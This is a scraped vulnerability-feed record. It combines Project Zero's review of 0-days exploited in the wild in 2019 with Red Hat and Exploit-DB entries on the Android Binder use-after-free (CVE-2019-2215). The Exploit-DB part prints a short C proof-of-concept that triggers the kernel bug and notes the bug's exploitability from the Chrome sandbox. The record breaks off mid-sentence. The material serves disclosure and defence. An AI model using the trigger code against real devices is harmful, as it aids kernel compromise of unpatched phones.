\n\n\nOur hope is that these analyses are helpful for others in the security and tech communities to act on data gleaned from detected 0-day exploits and help determine ways to make it more costly, more time consuming andmore difficult for attackers to use 0-days in the wild. Please [reach out](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0&range=A18>) with any feedback and/or suggestions and we hope that others will also begin publishing information from the [RCA template](<https://docs.google.com/document/d/1z1s__qj16DdhRvAg_TJlmRrXKosUSWfpm463Mjk24Vs/view>) in the future.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-29T00:00:00", "type": "googleprojectzero", "title": "\nRoot Cause Analyses for 0-day In-the-Wild Exploits\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1107", "CVE-2019-11707", "CVE-2019-1367", "CVE-2019-13720", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-2215", "CVE-2019-7286", "CVE-2019-7287"], "modified": "2020-07-29T00:00:00", "id": "GOOGLEPROJECTZERO:4C8E7D595A367E9DA6260DA13FAF3886", "href": "https://googleprojectzero.blogspot.com/2020/07/root-cause-analyses-for-0-day-in-wild.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-24T02:03:13", "description": "Posted by Maddie Stone, Project Zero\n\n** \n**\n\nIn May 2019, Project Zero released our [tracking spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>) for 0-days used \u201cin the wild\u201d and we started a more focused effort on analyzing and learning from these exploits. This is another way Project Zero is trying to make zero-day hard. This blog post synthesizes many of our efforts and what we\u2019ve seen over the last year. We provide a review of what we can learn from 0-day exploits detected as used in the wild in 2019. In conjunction with this blog post, we are also publishing another [blog post](<https://googleprojectzero.blogspot.com/2020/07/root-cause-analyses-for-0-day-in-wild.html>) today about our root cause analysis work that informed the conclusions in this Year in Review. We are also releasing [8 root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>) that we have done for in-the-wild 0-days from 2019. \n\n** \n**\n\nWhen I had the idea for this \u201cYear in Review\u201d blog post, I immediately started brainstorming the different ways we could slice the data and the different conclusions it may show. I thought that maybe there\u2019d be interesting conclusions around why use-after-free is one of the most exploited bug classes or how a given exploitation method was used in Y% of 0-days or\u2026 but despite my attempts to find these interesting technical conclusions, over and over I kept coming back to the problem of the detection of 0-days. Through the variety of areas I explored, the data and analysis continued to highlight a single conclusion: As a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can\u2019t draw significant conclusions due to the lack of (and biases in) the data we have collected.\n\n** \n**\n\nThe rest of the blog post will detail the analyses I did on 0-days exploited in 2019 that informed this conclusion. As a team, Project Zero will continue to research new detection methods for 0-days. We hope this post will convince you to work with us on this effort.\n\n# The Basics\n\nIn 2019, 20 0-days were detected and disclosed as exploited in the wild. This number, and our tracking, is scoped to targets and areas that Project Zero actively researches. You can read more about our scoping [here](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>). This seems approximately average for years 2014-2017 with an uncharacteristically low number of 0-days detected in 2018. Please note that Project Zero only began tracking the data in July 2014 when the team was founded and so the numbers for 2014 have been doubled as an approximation. \n\n[![Line graph showing 0-days detected in the wild by year with a bitmoji of Maddie scratching her head and the thought bubble saying \"What aren't we detecting?\". The line graph has the following values: 2014 - 22, 2015 - 28, 2016 - 25, 2017 - 22, 2018 - 12, 2019 - 20.](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRldAvfDbg3A2Me72ElorUu10dsFRB520wK9tsGmsyoDqJjvL-UXsZigl7V7pY55kR-D43oreASv0fn6zfbL3j55TFXMVh8xr2ztualFcVkzUgjQ_GXAu2eKrJB4G7axpHOr32E9MUoE06UeYFLb7Gioi9huqAyEGtBIFKZS_VEtfrKm1MgglTPzEA/s1200/image2%283%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRldAvfDbg3A2Me72ElorUu10dsFRB520wK9tsGmsyoDqJjvL-UXsZigl7V7pY55kR-D43oreASv0fn6zfbL3j55TFXMVh8xr2ztualFcVkzUgjQ_GXAu2eKrJB4G7axpHOr32E9MUoE06UeYFLb7Gioi9huqAyEGtBIFKZS_VEtfrKm1MgglTPzEA/s1233/image2%283%29.png>)\n\nThe largely steady number of detected 0-days might suggest that defender detection techniques are progressing at the same speed as attacker techniques. That could be true. Or it could not be. The data in our spreadsheet are only the 0-day exploits that were detected, not the 0-day exploits that were used. As long as we still don\u2019t know the true detection rate of all 0-day exploits, it\u2019s very difficult to make any conclusions about whether the number of 0-day exploits deployed in the wild are increasing or decreasing. For example, if all defenders stopped detection efforts, that could make it appear that there are no 0-days being exploited, but we\u2019d clearly know that to be false.\n\n** \n**\n\nAll of the 0-day exploits detected in 2019 are detailed in the Project Zero [tracking spreadsheet here](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=8521108>). \n\n** \n**\n\n## 0-days by Vendor\n\nOne of the common ways to analyze vulnerabilities and security issues is to look at who is affected. The breakdown of the 0-days exploited in 2019 by vendor is below. While the data shows us that almost all of the big platform vendors have at least a couple of 0-days detected against their products, there is a large disparity. Based on the data, it appears that Microsoft products are targeted about 5x more than Apple and Google products. Yet Apple and Google, with their iOS and Android products, make up a huge majority of devices in the world. \n\n** \n**\n\nWhile Microsoft Windows has always been a prime target for actors exploiting 0-days, I think it\u2019s more likely that we see more Microsoft 0-days due to detection bias. Because Microsoft has been a target before some of the other platforms were even invented, there have been many more years of development into 0-day detection solutions for Microsoft products. Microsoft\u2019s ecosystem also allows for 3rd parties, in addition to Microsoft themself, to deploy detection solutions for 0-days. The more people looking for 0-days using varied detection methodologies suggests more 0-days will be found.\n\n[![Bar graph of number of 0-days by vendor \$Apple, Facebook, Google, Microsoft, Mozilla, and Trend Micro\$ with a Bitmoji of Maddie and a thinking face and the comment \"Things aren't how they appear...\"](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0sECeT3DuVOphtori3PifVVTpnQ6psorDh0zyW7AZx2mJK8dyQA0wh2b2CR-d_YvYQw6peqwmd2QBqb64IFI65mov8-uAJoDLKiWjLwQgnCgy_9yVAwwQnLtE9x1YtWjHkwgw8BbQ51C0Qb60l3-U3z6l9KBANVYS_2TBg4_ZCm_z8_OwQyo37dlY/s1200/image1%286%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0sECeT3DuVOphtori3PifVVTpnQ6psorDh0zyW7AZx2mJK8dyQA0wh2b2CR-d_YvYQw6peqwmd2QBqb64IFI65mov8-uAJoDLKiWjLwQgnCgy_9yVAwwQnLtE9x1YtWjHkwgw8BbQ51C0Qb60l3-U3z6l9KBANVYS_2TBg4_ZCm_z8_OwQyo37dlY/s1624/image1%286%29.png>)\n\n# Microsoft Deep-Dive\n\nFor 2019, there were 11 0-day exploits detected in-the-wild in Microsoft products, more than 50% of all 0-days detected. Therefore, I think it\u2019s worthwhile to dive into the Microsoft bugs to see what we can learn since it\u2019s the only platform we have a decent sample size for. \n\n** \n**\n\nOf the 11 Microsoft 0-days, only 4 were detected as exploiting the latest software release of Windows . All others targeted earlier releases of Windows, such as Windows 7, which was originally released in 2009. Of the 4 0-days that exploited the latest versions of Windows, 3 targeted Internet Explorer, which, while it\u2019s not the default browser for Windows 10, is still included in the operating system for backwards compatibility. This means that 10/11 of the Microsoft vulnerabilities targeted legacy software. \n\n** \n**\n\nOut of the 11 Microsoft 0-days, 6 targeted the Win32k component of the Windows operating system. Win32k is the kernel component responsible for the windows subsystem, and historically it has been a prime target for exploitation. However, with Windows 10, Microsoft dedicated resources to locking down the attack surface of win32k. Based on the data of detected 0-days, none of the 6 detected win32k exploits were detected as exploiting the latest Windows 10 software release. And 2 of the 0-days (CVE-2019-0676 and CVE-2019-1132) only affected Windows 7.\n\n** \n**\n\nEven just within the Microsoft 0-days, there is likely detection bias. Is legacy software really the predominant targets for 0-days in Microsoft Windows, or are we just better at detecting them since this software and these exploit techniques have been around the longest?\n\n** \n**\n\nCVE\n\n| \n\nWindows 7 SP1\n\n| \n\nWindows 8.1\n\n| \n\nWindows 10\n\n| \n\nWin 10 1607\n\n| \n\nWIn 10 1703\n\n| \n\nWIn 10 1803\n\n| \n\nWin 10 1809\n\n| \n\nWin 10 1903\n\n| \n\nExploitation of Latest SW Release?\n\n| \n\nComponent \n \n---|---|---|---|---|---|---|---|---|---|--- \n \nCVE-2019-0676\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n\nYes (1809)\n\n| \n\nIE \n \nCVE-2019-0808\n\n| \n\nX\n\n| \n| \n| \n| \n| \n| \n| \n| \n\nN/A (1809)\n\n| \n\nwin32k \n \nCVE-2019-0797\n\n| \n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n\nExploitation Unlikely (1809)\n\n| \n\nwin32k \n \nCVE-2019-0703\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n\nYes (1809)\n\n| \n\nWindows SMB \n \nCVE-2019-0803\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n\nExp More Likely (1809)\n\n| \n\nwin32k \n \nCVE-2019-0859\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n\nExp More Likely (1809)\n\n| \n\nwin32k \n \nCVE-2019-0880\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nExp More Likely (1903)\n\n| \n\nsplwow64 \n \nCVE-2019-1132\n\n| \n\nX\n\n| \n| \n| \n| \n| \n| \n| \n| \n\nN/A (1903)\n\n| \n\nwin32k \n \nCVE-2019-1367\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nYes (1903)\n\n| \n\nIE \n \nCVE-2019-1429\n\n| \n\nX\n\n| \n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nYes (1903)\n\n| \n\nIE \n \nCVE-2019-1458\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n\nX\n\n| \n| \n| \n| \n| \n\nN/A (1909)\n\n| \n\nwin32k \n \n** \n**\n\n## Internet Explorer JScript 0-days CVE-2019-1367 and CVE-2019-1429\n\nWhile this blog post\u2019s goal is not to detail each 0-day used in 2019, it\u2019d be remiss not to discuss the Internet Explorer JScript 0-days. CVE-2019-1367 and CVE-2019-1429 (and CVE-2018-8653 from Dec 2018 and CVE-2020-0674 from Feb 2020) are all variants of each other with all 4 being exploited in the wild by the same actor [according to Google\u2019s Threat Analysis Group (TAG)](<https://www.blog.google/threat-analysis-group/identifying-vulnerabilities-and-protecting-you-phishing/>). \n\n** \n**\n\nOur [root cause analysis](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1367.html>) provides more details on these bugs, but we\u2019ll summarize the points here. The bug class is a JScript variable not being tracked by the garbage collector. Multiple instances of this bug class were discovered in Jan 2018 by Ivan Fratric of Project Zero. In December 2018, Google's TAG discovered this bug class being used in the wild (CVE-2018-8653). Then in September 2019, another exploit using this bug class was found. This issue was \u201cfixed\u201d as CVE-2019-1367, but it turns out the patch didn\u2019t actually fix the issue and the attackers were able to continue exploiting the original bug. At the same time, a variant was also found of the original bug by Ivan Fratric ([P0 1947](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1947>)). Both the variant and the original bug were fixed as CVE-2019-1429. Then in January 2020, TAG found another exploit sample, because Microsoft\u2019s patch was again incomplete. This issue was patched as CVE-2020-0674. \n\n** \n**\n\nA more thorough discussion on variant analysis and complete patches is due, but at this time we\u2019ll simply note: The attackers who used the 0-day exploit had 4 separate chances to continue attacking users after the bug class and then particular bugs were known. If we as an industry want to make 0-day harder, we can\u2019t give attackers four chances at the same bug. \n\n# Memory Corruption\n\n63% of 2019\u2019s exploited 0-day vulnerabilities fall under memory corruption, with half of those memory corruption bugs being use-after-free vulnerabilities. Memory corruption and use-after-free\u2019s being a common target is nothing new. \u201c[Smashing the Stack for Fun and Profit](<http://phrack.org/issues/49/14.html>)\u201d, the seminal work describing stack-based memory corruption, was published back in 1996. But it\u2019s interesting to note that almost two-thirds of all detected 0-days are still exploiting memory corruption bugs when there\u2019s been so much interesting security research into other classes of vulnerabilities, such as logic bugs and compiler bugs. Again, two-thirds of detected 0-days are memory corruption bugs. While I don\u2019t know for certain that that proportion is false, we can't know either way because it's easier to detect memory corruption than other types of vulnerabilities. Due to the prevalence of memory corruption bugs and that they tend to be less reliable then logic bugs, this could be another detection bias. Types of memory corruption bugs tend to be very similar within platforms and don\u2019t really change over time: a use-after-free from a decade ago largely looks like a use-after-free bug today and so I think we may just be better at detecting these exploits. Logic and design bugs on the other hand rarely look the same because in their nature they\u2019re taking advantage of a specific flaw in the design of that specific component, thus making it more difficult to detect than standard memory corruption vulns.\n\n** \n**\n\nEven if our data is biased to over-represent memory corruption vulnerabilities, memory corruption vulnerabilities are still being regularly exploited against users and thus we need to continue focusing on systemic and structural fixes such as memory tagging and memory safe languages.\n\n# More Thoughts on Detection\n\nAs we\u2019ve discussed up to this point, the same questions posed in the team's [original blog post](<https://googleprojectzero.blogspot.com/p/0day.html>) still hold true: \u201cWhat is the detection rate of 0-day exploits?\u201d and \u201cHow many 0-day exploits are used without being detected?\u201d. \n\n** \n**\n\nWe, as the security industry, are only able to review and analyze 0-days that were detected, not all 0-days that were used. While some might see this data and say that Microsoft Windows is exploited with 0-days 11x more often than Android, those claims cannot be made in good faith. Instead, I think the security community simply detects 0-days in Microsoft Windows at a much higher rate than any other platform. If we look back historically, the first anti-viruses and detections were built for Microsoft Windows rather than any other platform. As time has continued, the detection methods for Windows have continued to evolve. Microsoft builds tools and techniques for detecting 0-days as well as third party security companies. We don\u2019t see the same plethora of detection tools on other platforms, especially the mobile platforms, which means there\u2019s less likelihood of detecting 0-days on those platforms too. An area for big growth is detecting 0-days on platforms other than Microsoft Windows and what level of access a vendor provides for detection..\n\n** \n**\n\n## Who is doing the detecting? \n\nAnother interesting side of detection is that a single security researcher, Cl\u00e9ment Lecigne of the Google's TAG is credited with 7 of the 21 detected 0-days in 2019 across 4 platforms: Apple iOS (CVE-2019-7286, CVE-2019-7287), Google Chrome (CVE-2019-5786), Microsoft Internet Explorer (CVE-2019-0676, CVE-2019-1367, CVE-2019-1429), and Microsoft Windows (CVE-2019-0808). Put another way, we could have detected a third less of the 0-days actually used in the wild if it wasn\u2019t for Cl\u00e9ment and team. When we add in the entity with the second most, Kaspersky Lab, with 4 of the 0-days (CVE-2019-0797, CVE-2019-0859, CVE-2019-13720, CVE-2019-1458), that means that two entities are responsible for more than 50% of the 0-days detected in 2019. If two entities out of the entirety of the global security community are responsible for detecting more than half of the 0-days in a year, that\u2019s a worrying sign for how we\u2019re using our resources. . The security community has a lot of growth to do in this area to have any confidence that we are detecting the majority of 0-days exploits that are used in the wild. \n\n** \n**\n\nOut of the 20 0-days, only one (CVE-2019-0703) included discovery credit to the vendor that was targeted, and even that one was also credited to an external researcher. To me, this is surprising because I\u2019d expect that the vendor of a platform would be best positioned to detect 0-days with their access to the most telemetry data, logs, ability to build detections into the platform, \u201ctips\u201d about exploits, etc. This begs the question: are the vendor security teams that have the most access not putting resources towards detecting 0-days, or are they finding them and just not disclosing them when they are found internally? Either way, this is less than ideal. When you consider the locked down mobile platforms, this is especially worrisome since it\u2019s so difficult for external researchers to get into those platforms and detect exploitation.\n\n** \n**\n\n## \u201cClandestine\u201d 0-day reporting\n\nAnecdotally, we know that sometimes vulnerabilities are reported surreptitiously, meaning that they are reported as just another bug, rather than a vulnerability that is being actively exploited. This hurts security because users and their enterprises may take different actions, based on their own unique threat models, if they knew a vulnerability was actively exploited. Vendors and third party security professionals could also create better detections, invest in related research, prioritize variant analysis, or take other actions that could directly make it more costly for the attacker to exploit additional vulnerabilities and users if they knew that attackers were already exploiting the bug. If all would transparently disclose when a vulnerability is exploited, our detection numbers would likely go up as well, and we would have better information about the current preferences and behaviors of attackers.\n\n** \n**\n\n# 0-day Detection on Mobile Platforms\n\nAs mentioned above, an especially interesting and needed area for development is mobile platforms, iOS and Android. In 2019, there were only 3 detected 0-days for all of mobile: 2 for iOS (CVE-2019-7286 and CVE-2019-7287) and 1 for Android (CVE-2019-2215). However, there are billions of mobile phone users and Android and iOS exploits sell for double or more compared to an equivalent desktop exploit according to [Zerodium](<https://zerodium.com/program.html>). We know that these exploits are being developed and used, we\u2019re just not finding them. The mobile platforms, iOS and Android, are likely two of the toughest platforms for third party security solutions to deploy upon due to the \u201cwalled garden\u201d of iOS and the application sandboxes of both platforms. The same features that are critical for user security also make it difficult for third parties to deploy on-device detection solutions. Since it\u2019s so difficult for non-vendors to deploy solutions, we as users and the security community, rely on the vendors to be active and transparent in hunting 0-days targeting these platforms. Therefore a crucial question becomes, how do we as fellow security professionals incentivize the vendors to prioritize this?\n\n** \n**\n\nAnother interesting artifact that appeared when doing the analysis is that CVE-2019-2215 is the first detected 0-day since we started tracking 0-days targeting Android. Up until that point, the closest was CVE-2016-5195, which targeted Linux. Yet, the only Android 0-day found in 2019 (AND since 2014) is CVE-2019-2215, which was detected through documents rather than by finding a zero-day exploit sample. Therefore, no 0-day exploit samples were detected (or, at least, publicly disclosed) in all of 2019, 2018, 2017, 2016, 2015, and half of 2014. Based on knowledge of the offensive security industry, we know that that doesn\u2019t mean none were used. Instead it means we aren\u2019t detecting well enough and 0-days are being exploited without public knowledge. Therefore, those 0-days go unpatched and users and the security community are unable to take additional defensive actions. Researching new methodologies for detecting 0-days targeting mobile platforms, iOS and Android, is a focus for Project Zero in 2020.\n\n** \n**\n\n# Detection on Other Platforms\n\nIt\u2019s interesting to note that other popular platforms had no 0-days detected over the same period: like Linux, Safari, or macOS. While no 0-days have been publicly detected in these operating systems, we can have confidence that they are still targets of interest, based on the amount of users they have, job requisitions for offensive positions seeking these skills, and even conversations with offensive security researchers. If Trend Micro\u2019s OfficeScan is worth targeting, then so are the other much more prevalent products. If that\u2019s the case, then again it leads us back to detection. We should also keep in mind though that some platforms may not need 0-days for successful exploitation. For example, this [blogpost](<https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html>) details how iOS exploit chains used publicly known n-days to exploit WebKit. But without more complete data, we can\u2019t make confident determinations of how much 0-day exploitation is occurring per platform.\n\n# Conclusion\n\nHere\u2019s our first Year in Review of 0-days exploited in the wild. As this program evolves, so will what we publish based on feedback from you and as our own knowledge and experience continues to grow. We started this effort with the assumption of finding a multitude of different conclusions, primarily \u201ctechnical\u201d, but once the analysis began, it became clear that everything came back to a single conclusion: we have a big gap in detecting 0-day exploits. Project Zero is committed to continuing to research new detection methodologies for 0-day exploits and sharing that knowledge with the world. \n\n** \n**\n\nAlong with publishing this Year in Review today, we\u2019re also publishing the [root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>) that we completed, which were used to draw our conclusions. Please check out the [blog post](<https://googleprojectzero.blogspot.com/2020/07/root-cause-analyses-for-0-day-in-wild.html>) if you\u2019re interested in more details about the different 0-days exploited in the wild in 2019. \n\n \n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-29T00:00:00", "type": "googleprojectzero", "title": "\nDetection Deficit: A Year in Review of 0-days Used In-The-Wild in 2019\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5195", "CVE-2018-8653", "CVE-2019-0676", "CVE-2019-0703", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0880", "CVE-2019-1132", "CVE-2019-1367", "CVE-2019-13720", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-2215", "CVE-2019-5786", "CVE-2019-7286", "CVE-2019-7287", "CVE-2020-0674"], "modified": "2020-07-29T00:00:00", "id": "GOOGLEPROJECTZERO:2E85097DC4FBE492B1CB6FAE84AFE126", "href": "https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2023-06-13T17:27:19", "description": "A flaw was found in the Linux kernel\u2019s Android compatibility functionality. A local attacker can abuse a use-after-free flaw in the Android binder code to corrupt memory or possibly escalate privileges.\n#### Mitigation\n\nThere is no mitigation required for this flaw as it does not affect shipping Red Hat Enterprise Linux kernels. \n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-21T15:44:29", "type": "redhatcve", "title": "CVE-2019-2215", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2023-04-06T06:19:45", "id": "RH:CVE-2019-2215", "href": "https://access.redhat.com/security/cve/cve-2019-2215", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2023-08-07T00:04:06", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-04T00:00:00", "type": "exploitdb", "title": "Android - Binder Driver Use-After-Free", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-2215", "CVE-2019-2215"], "modified": "2019-10-04T00:00:00", "id": "EDB-ID:47463", "href": "https://www.exploit-db.com/exploits/47463", "sourceData": "The following issue exists in the android-msm-wahoo-4.4-pie branch of https://android.googlesource.com/kernel/msm (and possibly others):\r\n\r\nThere is a use-after-free of the wait member in the binder_thread struct in the binder driver at /drivers/android/binder.c. \r\n\r\nAs described in the upstream commit: \r\n\u201cbinder_poll() passes the thread->wait waitqueue that\r\ncan be slept on for work. When a thread that uses\r\nepoll explicitly exits using BINDER_THREAD_EXIT,\r\nthe waitqueue is freed, but it is never removed\r\nfrom the corresponding epoll data structure. When\r\nthe process subsequently exits, the epoll cleanup\r\ncode tries to access the waitlist, which results in\r\na use-after-free.\u201d\r\n\r\nThe following proof-of-concept will show the UAF crash in a kernel build with KASAN (from initial upstream bugreport at https://lore.kernel.org/lkml/20171213000517.GB62138@gmail.com/):\r\n #include <fcntl.h>\r\n #include <sys/epoll.h>\r\n #include <sys/ioctl.h>\r\n #include <unistd.h>\r\n\r\n #define BINDER_THREAD_EXIT 0x40046208ul\r\n\r\n int main()\r\n {\r\n int fd, epfd;\r\n struct epoll_event event = { .events = EPOLLIN };\r\n\r\n fd = open(\"/dev/binder0\", O_RDONLY);\r\n epfd = epoll_create(1000);\r\n epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);\r\n ioctl(fd, BINDER_THREAD_EXIT, NULL);\r\n }\r\n\r\nThis issue was patched in Dec 2017 in the 4.14 LTS kernel [1], AOSP android 3.18 kernel [2], AOSP android 4.4 kernel [3], and AOSP android 4.9 kernel [4], but the Pixel 2 with most recent security bulletin is still vulnerable based on source code review. \r\n\r\nOther devices which appear to be vulnerable based on source code review are (referring to 8.x releases unless otherwise stated):\r\n1) Pixel 2 with Android 9 and Android 10 preview (https://android.googlesource.com/kernel/msm/+/refs/heads/android-msm-wahoo-4.4-q-preview-6/)\r\n2) Huawei P20\r\n3) Xiaomi Redmi 5A\r\n4) Xiaomi Redmi Note 5\r\n5) Xiaomi A1\r\n6) Oppo A3\r\n7) Moto Z3\r\n8) Oreo LG phones (run same kernel according to website)\r\n9) Samsung S7, S8, S9 \r\n\r\n\r\n*We have evidence that this bug is being used in the wild. Therefore, this bug is subject to a 7 day disclosure deadline. After 7 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.*\r\n\r\n\r\nConfirmed this proof-of-concept works on Pixel 2 with build walleye_kasan-userdebug 10 QP1A.191105.0035899767, causing KASAN crash. Proof of concept C code and new.out attached. KASAN console output attached.\r\n\r\n\r\nI received technical information from TAG and external parties about an Android exploit that is attributed to NSO group. These details included facts about the bug and exploit methodology, including but not limited to:\r\n * It is a kernel privilege escalation using a use-after free vulnerability, accessible from inside the Chrome sandbox.\r\n * The bug was allegedly being used or sold by the NSO Group. \r\n * It works on Pixel 1 and 2, but not Pixel 3 and 3a. \r\n * It was patched in the Linux kernel >= 4.14 without a CVE. \r\n * CONFIG_DEBUG_LIST breaks the primitive.\r\n * CONFIG_ARM64_UAO hinders exploitation.\r\n * The vulnerability is exploitable in Chrome's renderer processes under Android's 'isolated_app' SELinux domain, leading to us suspecting Binder as the vulnerable component.\r\n * The exploit requires little or no per-device customization.\r\n * A list of affected and unaffected devices and their versions, and more. A non-exhaustive list is available in the description of this issue.\r\n\r\nUsing these details, I have determined that the bug being used is almost certainly the one in this report as I ruled out other potential candidates by comparing patches. A more detailed explanation of this bug and the methodology to identify it will be written up in a forthcoming blog post when I find the time. \r\n\r\nWe do not currently have a sample of the exploit. Without samples, we have neither been able to confirm the timeline nor the payload.\r\n\r\nThe bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If the exploit is delivered via the web, it only needs to be paired with a renderer exploit, as this vulnerability is accessible through the sandbox. \r\n\r\nI\u2019ve attached a local exploit proof-of-concept to demonstrate how this bug can be used to gain arbitrary kernel read/write when run locally. It only requires untrusted app code execution to exploit CVE-2019-2215. I\u2019ve also attached a screenshot (success.png) of the POC running on a Pixel 2, running Android 10 with security patch level September 2019 